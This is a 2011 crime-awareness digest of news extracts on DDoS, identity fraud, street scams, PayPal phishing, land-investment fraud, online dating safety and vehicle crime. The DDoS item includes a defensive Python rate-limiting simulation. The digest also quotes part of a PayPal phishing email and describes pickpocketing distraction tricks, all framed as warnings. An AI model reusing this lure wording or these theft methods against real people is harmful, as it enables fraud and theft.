* establishing a checklist of actions to be carried out by CCTV operators before installing new cameras to check whether they are absolutely necessary;

* developing industry standards for equipment to ensure it is reliable, effective and gathers images that are of sufficient quality and in a useable format;

* improving public knowledge about systems in communities through consultation by police and local authorities and better public information; and

* considering whether further guidance is needed on how long data collected by CCTV and ANPR should be retained.

Crime Prevention Minister James Brokenshire said: "CCTV and ANPR systems play a vital role in the prevention and detection of crime. However it is important they are used in a way that does not invade law-abiding people's privacy or undermine the public's confidence in them.

"That's why we are establishing this code and that's why we are asking the public what they think should be in it. Alongside this, we will appoint a new Commissioner to monitor the code and ensure it is effective."

The code would be introduced on an incremental basis, with local authorities and police required to have due regard to it straightaway. The Government will consider whether the code should be extended to other organisations, such as businesses and private security firms, in due course.

(8th March 2011)


 

DDoS - WHAT DOES IT MEAN ?
Category : DDoS
Category : hacking

The following is mainly an extract from an article from the Webuser magazine dated 10th February 2011 (www.webuser.co.uk)

We have probably heard of the abbreviation before, so what does it mean?

DDoS stands for distributed denial of service. It is a malicious attack to bring down a website or a web server by overloading its bandwidth (the electronic path into the server - so if you overload it, it is like putting too many cars on the M25... eventually they will stop). Hackers can launch attacks by remotely instructing a group of infected (zombie) computers, known as a botnet, to repeatedly contact a website or server. This sudden surge in web traffic can cause a website to work slowly or shut down completely. Hackers use malware and Trojan viruses to bring PCs into the botnet. Many people have no idea that their computer has been sabotaged in this way, though they may notice that it doesn't work as well as it used to.

Once a botnet launches a DDoS attack, there's not a lot that the targeted website can do to protect itself. A website can limit the amount of traffic allowed on its server, but this will also restrict legitimate visits. If the origin of the attack can be identified, then the website can contact its ISP and ask it to filter the traffic, but this isn't easy because many infected computers disguise their address.
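The trade-off described above, worked through as an added example (it is not from the Webuser article). It goes one step further than the text by comparing a flood sent from a single address with the same flood spread across a botnet; the capacity, limits and traffic counts are all constructed assumptions.

```python
from collections import Counter

CAPACITY_RPS = 100   # assumed: requests the server can answer per second
PER_SOURCE_RPS = 2   # assumed: per-address limit enforced in front of the server


def one_second_of_traffic(visitors, attack_requests, attack_sources):
    """Return one second of constructed traffic as (source, is_legit) tuples.

    Each visitor sends one request. The attack requests are spread
    round-robin over `attack_sources` addresses, and visitors are spaced
    evenly through the arrival order so neither group queues first.
    """
    total = visitors + attack_requests
    step = max(1, total // visitors) if visitors else 0
    traffic, v, a = [], 0, 0
    for pos in range(total):
        take_visitor = v < visitors and (a >= attack_requests or pos % step == 0)
        if take_visitor:
            traffic.append((f"visitor-{v}", True))
            v += 1
        else:
            traffic.append((f"bot-{a % attack_sources}", False))
            a += 1
    return traffic


def simulate(traffic, per_source_limit=None, capacity=CAPACITY_RPS):
    """Apply an optional per-address limit, then the server's capacity cap.

    Returns how many legitimate and attack requests were answered.
    """
    seen = Counter()
    served = {"legit": 0, "attack": 0}
    answered = 0
    for source, is_legit in traffic:
        seen[source] += 1
        if per_source_limit is not None and seen[source] > per_source_limit:
            continue  # dropped by the per-address limiter
        if answered >= capacity:
            continue  # the server has nothing left to give this second
        answered += 1
        served["legit" if is_legit else "attack"] += 1
    return served


def scenarios():
    """Run the four cases discussed in the text on constructed traffic."""
    quiet = one_second_of_traffic(50, 0, 0)
    one_address = one_second_of_traffic(50, 950, 1)   # flood from one address
    botnet = one_second_of_traffic(50, 950, 950)      # same flood, 950 addresses
    return {
        "normal day": simulate(quiet),
        "flood, overall cap only": simulate(one_address),
        "one-address flood, per-address limit": simulate(one_address, PER_SOURCE_RPS),
        "botnet flood, per-address limit": simulate(botnet, PER_SOURCE_RPS),
    }


if __name__ == "__main__":
    for name, served in scenarios().items():
        print(f"{name:40s} visitors answered: {served['legit']:2d}/50, "
              f"attack requests answered: {served['attack']}")
```

With only an overall cap, the flood crowds out nine in ten real visitors. A per-address limit rescues them when the flood comes from one machine, but not when each of 950 infected machines sends what looks like a single ordinary request.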

Most DDoS attacks come from cybercriminal gangs, rogue hackers or countries' secret services. The headline-grabbing potential of DDoS makes it especially effective for activists or hacktivists who want to raise awareness of an issue. Attacks have become increasingly politically motivated.

So what are the punishments for a DDoS attack? Well, that depends on where the offence took place, and we are talking about the worldwide web here! If the perpetrator resides in the UK and the crime affected an organisation within the UK they would be charged under the Computer Misuse Act 1990 (http://www.legislation.gov.uk/ukpga/1990/18/section/1). Anyone convicted of a DDoS attack faces a maximum penalty of 10 years in prison or fines of £5,000.

When the media discuss DDoS it is because a large organisation has been affected. The most recent organisations are Visa, Mastercard, Paypal and Amazon. As Visa and Mastercard are the largest credit card companies one can assume that their customers have been affected by the DDoS problem indirectly. But the sheer fact that there are so many computers worldwide that can be taken over remotely to form such an attack is also a concern. Personal security on a computer can cost nothing (see AVG). If your computer has been made a member of a botnet it also means that your personal details (banking etc.) could also have been hacked and your identity stolen.

(7th March 2011)


IS YOUR IDENTITY AT RISK ?
Category  : Identity theft
Category : fraud

The following is an extract from a quick reference guide leaflet produced by Fellowes and the website www.stop-idfraud.co.uk

Identity fraud could affect any one of us - from a personal and a business perspective. Finding out that someone has stolen your identity is not just an inconvenience, it can be devastating.

Unfortunately identity thieves and organised criminal gangs are continuing to target individuals and businesses - and the latest figures from CIFAS show that once again, ID Fraud is on the increase with the first quarter of 2010 showing a 19.96% increase in the number of victims when compared with the same period of 2009.

So, how can you protect your identity and safeguard your business ? The following provides the basic steps you should be taking, but for a more comprehensive overview and full outline of preventative hints and tips, visit :
www.stop-idfraud.co.uk

How can your identity be stolen ?

With information ! Simply put, criminals can steal your identity by gaining access to personal or confidential information about you or your business and use it to order goods or services, or even take out loans, credit cards or open bank accounts in your or your business's name.

- Through the theft of bags / wallets
- Stealing bank statements and other key information from bins (known as bin raiding).
- Redirecting your post unofficially to another address.
- Sending bogus emails to trick you into providing sensitive information (Phishing)

It could happen to you

From lost wallets to going through your bins, fraudsters are increasingly resourceful about how they get your information, but for people and companies who fall victim, the outcome is just as devastating regardless of how the information was obtained :

Case study 1

Mr A, aged 40, had £900 taken out of his account by criminals. Mr A suspects that the criminals got hold of his details from a number of statements he threw away the week prior to the identity fraud. "After having my identity targeted three times I became very cautious, but now because I shred everything I can throw away my mail with peace of mind. Another thing I have found very useful is to check my credit rating on a regular basis. This way you are made aware of any other addresses or accounts that are linked to you."

Case study 2

Stuart owns company Y. Aged 34, he had a staggering £22,000 stolen through fraudulent means from his business and personal bank accounts two years ago. "I would advise everyone never to use their mother's real maiden name as a security answer, as it is just too difficult to keep it a secret. Use something funny or even stupid, call her Posh Spice or Domestos if you have to."

Top Tips to keep your identity safe

- Keep your personal information, credit cards, passwords and pin numbers in a safe place ( preferably a lockable drawer or safe) and don't share these details with people or companies you don't know.

- Never throw away bills, receipts, credit or debit card slips, bank statements or even unwanted post without destroying them first, ideally with a cross cut shredder.

- Always protect your post, especially if you live in a building where other people can easily access it. When you move house, redirect your mail from your old address to your new one for at least a year.

- Check all your statements and financial records as soon as they arrive and report any discrepancies straight away.

- Regularly obtain a copy of your credit report.

- Be wary of publishing any identifying information about yourself online. In particular things like : phone numbers, pictures of your home, workplace or school, your address, birthday or full name.

- Make sure your computer is protected from the threat of online attacks.

And some extra advice for business

- Register with Companies House and make sure you sign up to their Electronic Filing, PROOF and Monitor services which will help to prevent fraudsters changing the names of your directors and effectively "hijacking" your company.

- Make sure that all your staff are fully informed about the risk of identity fraud. Create a clear set of guidelines and procedures for employees concerning the handling, storage and sharing of sensitive information, both on and off-line.

- Always make sure that you and your staff properly destroy unwanted information. As well as shredding paper, don't forget to shred CDs and always make sure that the information on old computers is wiped clean before throwing them out.

- Always check the identity of your customers. Both business and consumer credit reference agencies offer a wide range of solutions to authenticate and verify the identity of customers to ensure that they exist and are who they say they are.

- Businesses can now be fined up to £500k for serious breaches of the Data Protection Act.

- Documents which are left on printers and in meeting rooms are liable to be seen by prying eyes. Always clear up after yourself and properly dispose of confidential waste.

How to spot if your identity has been stolen

If your car or computer is stolen, it is obvious to spot. But how do you know if someone has stolen your identity ? The signs may not be as clear, but there are some things which could indicate you or your company might be a victim :

- you start getting letters or bills in your name from companies with which you are not familiar. For example, bills or receipts for things you haven't bought, a mobile phone in your name which you didn't know about or letters regarding outstanding debts which are not yours.

- you stop getting bills or statements or post in general which you normally receive on a regular basis.

- You are refused a financial service, such as a credit card or a loan, despite having a good credit history.

For more information on identity crime, including useful hints, tips and exclusive downloads to help keep your identity safe and to protect your business / employer ; visit : www.stop-idfraud.co.uk


uaware note

The information quoted in this extract is relevant and very useful. However, the website (www.stop-idfraud.co.uk) though useful, is closely associated with the office equipment manufacturer Fellowes.

(7th March 2011)


HOW NOT TO BE SCAMMED
(BBC News, original article dated 15th June 2010 author Denise Winterman)
www.bbc.co.uk
Category : scam

When it comes down to it all scams are distraction theft. Online scams distract you by making you think that your ID has been compromised and you will lose money. Real time theft such as pickpocketing distracts your eyes and bodily senses away from your valuables.

Extract of original article : http://news.bbc.co.uk/1/hi/magazine/8740984.stm

The Squirt

This is also known as the mustard dip, the ketchup dip or the bird poo and, like the sting used on Bennett, it's a classic scam which involves thieves getting the attention of their prey by squirting something on them. It can be a white mixture that looks like a pigeon's handiwork on someone's shoulder in the street or tomato ketchup in a cafe.

The scammer then helps their target clean up the mess, offering tissues, and while they do so steal the person's wallet.


The Photo

Another variation of the "distraction" technique. A couple will ask their target to take a photograph of them and proceed to explain how the camera works. While their target is listening they are pick-pocketed by a third person.

They may even put their bag down to take the photo and it is easily snatched. The couple may stick around to "help" the victim. The "helpful" accomplices then offer to call the victim's bank so they can cancel their cards.

The victim proceeds to give her bank details and Pin... only the person on the other end of the line isn't a bank employee at all, but a colleague of the scammers.

The Escalator 

Everyone has a daily routine and good con artists try to tap into that because then your suspicions aren't alerted.

So there you are, minding your own business, about to get off the escalator and the person in front drops their loose change. They are scrabbling to pick it up, you may try to help, it causes a bit of a jam and you have people bumping up behind you as they try to get off.

It quickly becomes a bit of a bundle. As it turns out the person in front and behind you are pickpockets and in the jumble, they have lifted your phone from your bag or pocket.

The shoulder surf

You may think you are being vigilant but thieves are clever. At the cash point you carefully key in your Pin and the amount you want to withdraw, then you feel a tap on the shoulder and the person behind you asks if you have dropped a £10 note lying on the floor.

You take a quick look, maybe impressed by their honesty, say no and turn back. Your money is there, but not your bank card.

The theft is achieved by the "helpful" person memorising your Pin and then distracting you at the precise moment his accomplice grabs the bank card as it is released from the machine. Within minutes, they will be at another cash point withdrawing as much cash as they can from your account. "A good scam manipulates you into acting a certain way, often by helping you."


The good Samaritan

Most people get a warm feeling from helping someone, it makes us feel good about ourselves and con artists prey on that.

A chap in Clifton in Bristol walks along the same road every day. Dressed like anyone else, he looks sheepish, carries a petrol can and says that he has run out of petrol and left his wallet at home, and could you please spare him a quid. I could tell this was dodgy a mile off for some reason, I'm fairly switched on, but for fun one time, I gave him a couple of quid... then followed him down the street. Saw him doing it over and over, kept following him, whereupon he deposited the can (after about 30 minutes of walking around) into his car, went into a local pub and started buying drinks. He was even meeting friends of his. A few weeks later I saw him again, smiled to myself and asked him about it. He laughed, wasn't in the least embarrassed and said that he does it all the time for his beer money rather than have his missus nag at him! He didn't think it was even vaguely dishonest to lie to people he didn't know about something harmless, and he said he'd been doing it for years and would continue. I chuckled a bit and moved on, slightly shocked that someone so normal would have such a glaring lack of morals.

(7th March 2011)


PAYPAL PHISHING - HAS YOUR ACCOUNT BEEN TEMPORARILY LIMITED ?
(Sophos, dated 7th January 2011 author Graham Cluley)
http://nakedsecurity.sophos.com
Category : spam

Have you received an email, seemingly from PayPal, declaring that your account has been temporarily limited?

Plenty of people have been targeted by an attack which uses the subject line "Your account has been temporarily limited!" and claims to come from what appears to be an official PayPal address.

Well, beware opening the attached reactivation form too quickly because you could be passing your personal information to cybercriminals.

Because the emails are bogus, and the headers are forged - all with the intention of stealing information from you. Here is part of the text (italics) that we are seeing being spammed out widely right now:

Dear PayPal account holder,

PayPal is constantly working to ensure security by regularly screening the accounts in our system. We have recently determined that different computers have tried logging into your PayPal account,and multiple password failures were present before the logons.

Sounds scary, eh? People on different computers have been trying to log into your PayPal account, and have been guessing at the passwords? Nasty!

Until we can collect secure information, your access to sensitive account features will be limited. We would like to restore your access as soon as possible, and we apologize for the inconvenience.

Those nice folks at PayPal are looking out for you! They've locked down the account because of all the attempted intrusions. Thank goodness!

Download and fill out the form to resolve the problem and then log into your account.

And sure enough, there is a form attached to the email.

But these emails and the form don't really come from PayPal, and entering your confidential information into the form is only going to pass your private data to the cybercriminals behind this spam campaign who will use it to phish your account for money and perhaps steal your identity.

Sophos customers * are proactively protected against this attack. You may not have fallen for it (the lack of graphics in the email body makes it look less convincing than some of the PayPal phishing scams we often see) but you may have other loved ones and acquaintances who would be vulnerable to an attack like this.



A WAVE OF PAYPAL PHISHING EMAILS
(Sophos, dated 23rd February 2011 author Graham Cluley)
Category : phishing

Over 200 million people have accounts on PayPal, making it a key target for internet fraudsters attempting to steal money.

One of the ways that criminals try to get their hands on your cash is by phishing for your PayPal account details.

An aggressive campaign that we have seen widely spammed out in the last few hours does precisely that, pretending to be a security warning from PayPal.

However, this attack's intention is to trick you into handing over your credit card details, full date of birth and name and address.

If you're ever uncertain whether a message really comes from PayPal or not, visit the real PayPal website and log in as usual. If they really have a security message for you, you'll be able to read it via the PayPal messaging system itself.

* uaware note

It is not just Sophos security software that "filters" out these phishing e mails.

(7th March 2011)


COSMETIC RETAILER LUSH FALLS VICTIM TO HACKERS
(Courtesy of : Computer Active, dated 21st January 2011 author James Temperton )
www.computeractive.co.uk
Category : hackers

The website of the cosmetics company Lush has been hacked, forcing it to be taken offline.

In a statement, the company said it was "still being targeted" by hackers and as a result it had decided to "completely retire" the current version of its website.

Lush also asked customers who placed orders online between 4 October 2010 and 20 January 2011 to contact their banks for advice as their card details "may have been compromised".

The retailer plans to launch a temporary website in the coming days, which will initially only accept payments via Paypal. In a somewhat tongue-in-cheek message to the hackers responsible, Lush praised their "formidable" talents.

Rik Ferguson, senior security advisor at internet security company Trend Micro, said: "For the most part shopping online is as safe as shopping in store, but when a compromise occurs at an online merchant often its consequences are far greater, affecting many more people than in store card cloning due to the centralised nature of online stores.

"If you feel you may have been affected, contact your bank immediately."

Concerned customers can also contact Lush on 01202 668545 or visit www.lush.co.uk.

(7th March 2011)


LAND INVESTMENT "SCAMS" WARNING
(BBC News, dated 5th March 2011 author Bob Howard)
www.bbc.co.uk
Category : scams

More and more people are being targeted by firms cold-calling them to buy land they say is ripe for development, the BBC has learnt. Many are persuaded to pay tens of thousands of pounds for land which is unlikely ever to be built on. The Financial Services Authority (FSA) said it was investigating about 20 such schemes.

The City of London Police's Economic Crime Directorate said what it had seen so far was the tip of the iceberg.

Pressure selling

William McNaught, from Yorkshire, was contacted by The Property Partnership three years ago and persuaded to pay £101,000 in order to buy eight strips of land in different locations around the UK.

He said he was convinced by the high returns which were promised.

"They were so convincing. The broker told me the investment would achieve a profit of 100-130% in a period of 12 to 18 months," he said.

Radio 4's Money Box has investigated a strip of land Mr McNaught bought near Towcester in Northamptonshire for £10,000 in September 2009.

Instead of being close to development, the land is within the boundaries of the historic Easton Neston Estate and the local council has served further restrictions which mean not even fences or agricultural sheds can be erected.

Planning restrictions

John Townsend, the councillor responsible for planning at South Northamptonshire District Council, said the area was protected to prevent any sort of development.

"It is in open countryside, it is in a conservation area, there are endless reasons why I think it would be very unlikely that planning permission would ever be given," he said.

"Nothing can be put here, they cannot put up any fencing, they cannot put up any sheds or huts."

Craig Bees, a director of the local estate agency Bartram and Company, was asked by Money Box to try and value one of Mr McNaught's strips of land. He believes it is worth a fraction of what he paid for it.

"I would describe it as a postage stamp in the middle of a park. It has no access to it and it is too small to build anything meaningful on," he said.

"It has very little or no planning potential. The plot is worth in the order of £75."

Mr McNaught admitted he did not make local enquiries before agreeing to buy the land, something he now bitterly regretted. "I have been foolish and I am now paying the penalty for that foolishness," he said.

The Property Partnership is run by Gavin Gravesande. Money Box asked The Property Partnership to comment on the land it has sold to Mr McNaught but it has not responded.

Regulatory action

The City of London Police's Economic Crime Directorate said Mr McNaught was not alone in having been tricked into handing over large sums in order to buy land which had minimal value.  Detective Chief Inspector David Clarke said this was a growing problem. "There is a significant amount of activity within the law enforcement community ongoing at this point in time to assess how big the problem is. I believe what we are seeing at the moment is only the tip of the iceberg," he said.

The FSA said it had closed down five land investment schemes in the past year in which £42m had been invested. However it can only act if it is able to prove that a firm is effectively running a collective investment scheme in which it promises to liaise with potential developers on behalf of clients.

Jonathan Phelan, head of unauthorized business at the FSA, said the organization was doing its best to clamp down on the problem. "Where you have a collective investment scheme, we can get involved. We would estimate it to be around a £200m problem. We have got 20 firms under inquiry," he said. "What we are seeing now is much more criminal. They are not even trying, they know they are buying land which will never get planning permission."

He urged anyone who believed they had been a victim to come forward.

"Please, do come to us because there are a dozen, a hundred, a thousand people who are going to come after you and lose similar amounts of money. We really need you to tell us," he said.

(7th March 2011)


NEWS FROM MY SPAM INBOX !
Category : phishing

Apart from the regular adverts for various forms of pharmaceutical paraphernalia, namely Viagra, my Internet Service Provider's (ISP) spam filter has done a very good job. In the last 2 weeks it has managed to filter out 10 phishing e mails and place them in a "be warned" post box.

In previous months I received phishing e mails supposedly from Lloyds, Lloyds TSB, NatWest. This time I have received more of a variety. Apart from the well known banks already mentioned, I now have phishing e mails in relation to :

Her Majesty's Revenue and Customs (HMRC) - offering a refund if I supply my banking details.

Liberty Reserve (who?) Well they are the oldest, safest and most popular payment processor operating in Costa Rica and serving millions all around a world. They store your funds privately in gold ! This e mail stated that my online account had been compromised; and that I should renew my password etc, etc.

Egg card - requesting that I re-activate my Egg card using their simple link !

Egg card - requesting that I reset my password as my account has been blocked; using their simple link.

United Parcel Service (UPS) - an e mail stating that a parcel is due for delivery, but to obtain details I would need to open an attachment. Unsolicited e mails with attachments are known to contain malicious software. If someone needs to deliver something to you they would find other means to contact you. Normally if someone did try to leave you a parcel they would have left a "drop-card" to say they had called.

DO NOT reply to any e-mails of this nature, just delete them. If you do have suspicions about the security of your bank or savings account contact the institution immediately direct, NOT via any e mail link or telephone number quoted in such an e mail.

If you think you have been CONNED by such an e mail inform your bank or savings institution immediately by telephone and follow it up with a recorded delivery letter. Also inform the "ActionFraud" helpline.

(7th March 2011)


 

LEARNER DRIVERS - DRIVEN TO FAIL
(CSMA* MAGAZINE, dated February 2011 author Shirley Burke)

Thousands of learner drivers failed their tests last year as a result of being trained by trainee driving instructors - according to the AA. Up to 27,000 trainee-taught learners failed, with a test re-take cost estimated in the region of £1.7 million. Further budget was spent on extra lessons to bring the learners up to test standard.

A trainee instructor has to pass an exam before they can claim to be fully qualified, but with the current pass rate at just 30%, the majority never make the grade or continue with a career in driving instruction. More than one in seven instructors are in the trainee stages, according to the Driving Standards Agency. This figure more than doubled in the last two years to over 7600, possibly as a result of television advertising, encouraging viewers to consider driving instruction as an extra-income, part-time career.

The issue was recently highlighted by the BBC "Rip Off Britain" programme, which exposed well known driving schools for charging students full price for lessons from trainees.

"Most disturbingly, it seems officials no longer even try to track the impact this has on learner drivers," says the AA President, Edmund King. "Now, more than ever, learners must be given an informed choice of instructors.

Driving schools must come clean when they are using trainee instructors to teach young people to drive". Learners should be wary of phrases such as "DSA approved", which does not necessarily mean the instructor has passed the exam. Most pupils admit to being unaware that their instructor is learning on the job, but it's worth knowing that they are obliged by law to display their qualifications on the windscreen.

A GREEN badge means your instructor is fully qualified and a PINK one they are still a trainee.

Did you know ?

- 153,000 driving tests were taken last year.

- A decade long study has revealed that learners taught by a trainee driving instructor were 25% less likely to pass their test on the first attempt.

- 49% is the percentage of men who passed their test in 2010, compared with a 42.8% success rate for women.

* Civil Service Motoring Association

(7th March 2011)


11th Feb to 5th March. Sorry for the lack of display, but we have been away !

 


ONLINE DATING - A CRIME PREVENTION TOOL
(Police Oracle, dated 11th February 2011 author Cliff Caswell)
www.policeoracle.com

As Valentine's Day approaches, the story of how you met the love of your life always promises to generate plenty of interesting pub conversation - especially if it started with nothing but a name on a screen and a profile.

With the online world and social networking becoming part of the fabric of our lives, relationships are increasingly being formed in cyberspace. No longer do couples have to stumble out their chat-up lines at the nightclub bar, they can reel them off while being continents apart.

The snag is that you could - virtually - be talking to anybody. Behind the avatar and the profile that tells you of beauty, wealth and success can be something distinctly ugly - something that is ugly, in reality, to the point of death.

Online relationships that suddenly turn into a horrifying reality have been echoed through the media for the past decade-and-a-half. Reports of internet meetings ending in assault, rape and worse have filled endless column inches and hours of airtime - a grim warning of the dark side of the web.

Although rare, the risks are certainly genuine and deadly. In 2009, 17-year-old Ashleigh Hall was raped and murdered by Peter Chapman in Sedgefield. The 33-year-old had met the youngster on Facebook, posing as a teenager himself.

Figures from the Metropolitan Police also make for some sobering reading. Last year there were 93 crimes reported that related to "media approaches" on the internet - around double the number from the previous 12 months.

Despite the tragic stories of relationships involving the web, the growth of the online dating industry over the past ten years remains a clear indicator of the popularity of the digital age in our social lives - and there are indications that internet users have become savvy when it comes to protecting themselves.

Geoff Hyams, a former Detective Inspector with the Metropolitan Police, understands the concept of protection. As well as being a veteran officer who has had his fair share of gruesome investigations, he is also the founder of dating website UniformDating.com - a meeting point for members of the UK's uniformed services as well as interested civilians - which launched seven years ago and is approaching around 250,000 subscribers across the country.

The idea for the site came from the 999 parties used by members of the emergency services to meet each other and membership had initially been reserved for uniformed personnel. Its expansion was taken to a new level when it was opened up to the wider civilian community who wanted to date somebody who worked in uniform.

Having spent a large part of his 17-year career working on Major Incident Teams and investigating serious crimes including rape and murder, he maintains that the internet - if treated with the right levels of care and respect - can prove to be one of the safest environments available to set up a date.

"If you look at cases of rape and assault around a traditional 'first date', you find that often the people concerned have no prior knowledge of each other, have met in a pub or club and have had a few drinks before the encounter," he said.

"There have been cases that I have investigated where - had the victim had the ability to check out the person they were going to meet - the incident would have been avoided.

"With the internet, you have time to put in place layers of security. You can build in some sensible measures to reduce the likelihood of becoming a victim, as well as satisfying yourself that the person you are going to meet is who they say they are."

Hyams points out that all other real-world precautions of dating - such as meeting in a public place and ensuring a taxi home is pre-booked - are vital disciplines. Most people, he maintains, use the internet as a pre-meeting tool.

He said: "With the likes of police officers using our site, we have a very keen awareness of safety and have produced a list of tips for online dating safety - this is available to anyone regardless of whether they want to be a member, which you can now access via a Safety Advice button on the website.

"You have to remember that there is a PlayStation generation who have grown up with the internet and they are entirely comfortable with using the technology," he added. "In particular you find that teens and those in their early 20s have a healthy wariness about the information they exchange online."

Jacqui Hames, a former Detective Constable with the Met who presented the appeals section of the BBC Crimewatch show for 16 years, believes the internet must be treated with respect.

The ex-officer, who co-wrote the book Savvy: A Modern Girl's Guide to Doing It All Without Risking It All with the show's presenter Fiona Bruce, believes that anyone tempted by online dating must find out as much as possible about their would-be match - and take all sensible precautions when meeting.

"The fact is that, unless you go on a blind date, you are generally likely to know the person you are meeting in some way beforehand," she said. "But in an online environment anyone can write anything about themselves, so the first piece of advice is to determine if the person you are meeting is who they say they are.

"If you do decide to set up a date, you should make sure that you are in a public place and make arrangements to get there and leave under your own steam. You should also give details of where you are meeting to a friend, text them on your return and offer to pay for your own food and drink."

In Savvy, Hames also sets out some useful guidance about establishing whether a dating website is legitimate - establishing whether it looks professionally produced and making sure it has a proper terms of use page.

But the former officer - who has a teenage daughter - acknowledges that common sense can go out of the window when people are caught up in the emotions of a date.

"Setting up a date with somebody you do not know can present difficulties because you are trying to open up emotionally to them," she added. "You need to have a clear checklist of what you are doing and stick to it."

Det Supt Caroline Bates, Operational Commander in Charge of the Met's Operation Sapphire - which specialises in investigating rape and sexual assault cases as well as providing victims with the support they need - agreed that a common sense approach to dating is required, particularly in the online environment.

"The issue is that people tend to feel safe on the internet because they are in their own front room - they relax and put their guard down and accept what the person in front of them has told them is true," the officer said. "What you have to remember is that it could be somebody completely different.

"I think most websites have some form of advice and guidance now - I would like to see that displayed a bit more prominently - but the main point is that people should not make assumptions and maintain their awareness. Some people do this for the first few times but then let their guard down."

Despite concerns about dating online, Bates accepts that social media is now naturally integrated into the lives of the vast majority of people. She said people need to make sure they apply the same levels of security to their online behaviour as in the real world.

"You need to be cautious about presenting too much personal information," she said. "And you need to take precautions if you decide to meet. If possible, don't go on your own. But if you do go by yourself make sure somebody knows where you have gone and who you are meeting - it is all about staying safe, but if you do become a victim make sure you report it to the police."

Out on a date or out alone, stay safe : www.met.police.uk/sapphire/staying_safe.htm
Dating - what do the Police do ! : http://www.uniformdating.com/misc/general_safety_advice.html

(11th February 2011)


 

CEOP SAYS "THINK BEFORE YOU SEND"
(News Distribution Service, Central Office of Information, dated 8th February 2011)
http://nds.coi.gov.uk

"Think before you send" is the message from the Child Exploitation and Online Protection (CEOP) Centre - the UK's national centre for protecting children - as it marks EU Safer Internet Day 2011 to talk about the dangers young people face when sending indecent images of themselves to each other, often called 'sexting'.

This is in response to increasing evidence that such images are being shared with wider groups of friends. Research from Beatbullying highlighted that 38% of 11-17 year olds have received a sexually explicit or distressing text or email, with 70% admitting they knew the sender. Young people often do not realise that by digitally sharing such images, they may lose control and may never really know where it ends up. In some extreme cases, CEOP has found these in the collection of child sex offenders and their networks.

To support this message and Safer Internet Day, which falls on Tuesday 8 February, CEOP has launched a brand new resource called "Exposed"; a ten minute film aimed at 11-16 year olds, encouraging them to think about their actions and how these may affect others and their lives in future. Together with lesson plans and accompanying activities, the film has been produced in consultation with leading charities and education practitioners and is available free of charge at www.thinkuknow.co.uk/teachers.

Peter Davies, Chief Executive of the CEOP Centre says: "We know that young people are increasingly using technology not only to stay in touch, but to explore their sexuality and to push the boundaries in what they send and to whom they send it. It is now so easy to send pictures instantly via emails and texts that we are seeing instances of boys or girls sending sexual images of themselves to others without considering the consequences. They often find out later that the image has been passed on to many others and as a result they can be the victims of bullying or harassment.

"In some rare instances we have seen these images end up in the collections of offenders. It is important that we look to raise awareness of this risk by launching new resources into our established education programme Thinkuknow so that young people can make the right choices".

Minister for Crime Prevention James Brokenshire said: "Child protection will always be an absolute priority for Government and CEOP continues to play a crucial role in ensuring children are safeguarded.

"This is a worrying trend. We should encourage young people to use technology but it's really important that they are made aware of the dangers involved too.

"I welcome this new campaign which will help to raise awareness of the risks and educate young people about staying safe online."

Charlotte Aynsley, Beatbullying Director of Practice continues: "Beatbullying is extremely proud of our long standing partnership with CEOP. It is vital we are able to work together in such a capacity and continue to produce useful tools to help highlight child safety online."

"Early intervention needs to be part of the solution if we are to educate our young people, teachers and families about the consequences of their actions and how to keep our children and young people safe online as well as offline."

CEOP are also council members of the government's UK Council For Child Internet Safety (UKCCIS) and will be supporting the launch of new good practice guidance for moderation, social networking, search, chat and instant messaging services - available at www.education.gov.uk/ukccis - and will continue to endorse the work of the UK Safer Internet Centre which is formed of Childnet, the South West Grid for Learning, and the IWF. Visit www.saferinternet.org.uk for more information.

CEOP will also be announcing the winner of this year's 'My Life Online' competition, which has been running on its Thinkuknow website since December 2010.

On the work of UKCCIS and wider collaboration, Peter Davies emphasised the need for partnership: "The real value of UKCCIS from our point of view is providing that mechanism and forum for ensuring collaboration from all interested sectors. This is fundamental to making children safe today. No matter what sector or position we represent, I truly believe that only by working together can we collectively make a real difference in making the internet safer today and into the future. That is why we as always remain fully committed to the principles of this vital Council".

(11th February 2011)


 

AVCIS PROVES ITS WORTH IN VEHICLE CRIME DETECTION
(Police Oracle, dated 8th February 2011)
www.policeoracle.com
 
Retrieval of stolen cars from South Africa takes recent recovery rates to £4million...
Following the recovery of 18 high-value stolen vehicles from South Africa, the UK's dedicated vehicle crime unit has announced that it has recovered vehicles valued in excess of £4 million during the past four months.

In the current economic climate, demand for high-value vehicles is great, and the ACPO Vehicle Crime Intelligence Service (AVCIS) has highlighted Durban as a key destination for stolen cars shipped from the UK. During a raid at a UK port in December 2010, containers with 16 stolen vehicles destined for Durban were intercepted by AVCIS, allowing the vehicles to be returned to their owners.

An ensuing investigation led to an additional 18 stolen cars being identified in South Africa, with AVCIS facilitating their recovery. The 36 vehicles recovered included models from prestige brands Audi, Lexus and Bentley, as well as Land Rover Discoveries.

"With shipping relatively cheap and loopholes present in African legislation, the exportation of stolen vehicles to this region is becoming increasingly popular with organised crime gangs," said AVCIS' Head of Unit, Detective Chief Inspector Mark Hooper. "The identities of legitimate vehicles are being cloned and attributed to identical stolen vehicles before being put into containers and shipped abroad, with Durban being high on the list of likely destinations."

Detective Constable Vince Wise, who visited South Africa to aid in the recovery of the vehicles, said: "We're working hard to identify and recover a significant number of vehicles that have been dispersed into Africa via Durban. We are aware that a number of stolen vehicles are located there and we're continuing our investigations in order to return these to the UK."

This investigation is just one of numerous operations AVCIS has in progress to recover stolen vehicles and remove them as a facilitator for serious organised crime. Funded predominantly by private sector partnerships, AVCIS receives a grant of £300,000 of taxpayers' money from the Home Office to assist in its important work.

"Despite the austere climate, AVCIS has consistently recovered over £1 million worth of stolen vehicles each month since October 2010," added DCI Hooper. "We're extremely happy with the results over the past few months, and are especially pleased with the significant recovery from South Africa.

"In the current climate, motorists are extremely vulnerable. Not only is AVCIS working to recover vehicles but it's also putting resources into increasing awareness of vehicle crime and ways in which motorists can protect themselves," added DCI Hooper. "Without essential funding from the Home Office and our valued partners, we would not be able to carry out this important work."

It is recognised that 'traditional' vehicle crime, such as theft of or from vehicles, is no longer regarded as a policing priority by most forces. Therefore, under the guidance of the Association of Chief Police Officers (ACPO) portfolio lead for Vehicle Crime matters, the ACPO Vehicle Crime Intelligence Service (AVCIS) was launched on 15th December 2006 and is based in Ryton-on-Dunsmore, Warwickshire within the NPIA (National Policing Improvement Agency) site. The unit was initially funded by the Home Office, through the ACPO Acquisitive Crime Board and answers to Deputy Chief Constable David Ainsworth, of Wiltshire.

